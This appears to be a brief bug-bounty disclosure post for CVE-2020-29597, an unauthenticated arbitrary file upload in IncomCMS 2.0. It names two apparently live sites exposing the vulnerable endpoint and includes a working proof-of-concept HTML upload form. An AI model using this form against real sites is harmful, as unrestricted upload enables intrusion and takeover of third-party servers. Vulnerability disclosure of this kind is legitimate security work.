layout | title | description | tags |
---|---|---|---|
post |
CVE-2020-29597 - IncomCMS 2.0 insecure files upload |
IncomCMS 2.0 is vulnerable to insecure files upload |
exploits bugbounty |
Hi there!, I've discovered endpoint that accepts any file and upload it without any validation or even being authentication
http://mzgesheft.kz/incom/modules/uploader/showcase/script.php
http://mekom.kz/incom/modules/uploader/showcase/script.php
<!DOCTYPE html>
<html>
<head>
<title>Upload your files</title>
</head>
<body>
<form enctype="multipart/form-data" action="http://www.example.com/incom/modules/uploader/showcase/script.php" method="POST">
<p>Upload your file</p>
<input type="file" name="Filedata"></input><br />
<input type="submit" value="Upload"></input>
</form>
</body>
</html>
Thanks for reading this.